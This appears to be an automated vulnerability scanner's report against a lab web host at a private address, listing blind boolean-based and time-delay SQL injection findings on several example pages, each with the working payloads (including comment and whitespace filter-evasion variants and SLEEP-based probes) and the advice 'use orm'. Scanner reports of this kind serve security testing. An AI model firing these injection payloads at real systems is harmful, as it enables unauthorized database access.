Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'90688'='90688
'	and	'19905'='19905
'	or	8651=8651#
'	and	'49937'='49938
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'90688'='90688
'	and	'19905'='19905
'	or	8651=8651#
'	and	'49937'='49938
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	98160=98160
	and	54738=54738
	or	67503=67503#
	and	62326=62327
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	98160=98160
	and	54738=54738
	or	67503=67503#
	and	62326=62327
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	98160=98160
	and	54738=54738
	or	67503=67503#
	and	62326=62327
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'57449'='57449
'/**/and/**/'80342'='80342
'/**/or/**/4925=4925#
'/**/and/**/'25875'='25876
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
54461=54461

and
96586=96586

or
48184=48184#

and
41033=41034
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'89742'='89742
'+and+'29852'='29852
'+or+83620=83620#
'+and+'21723'='21724
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---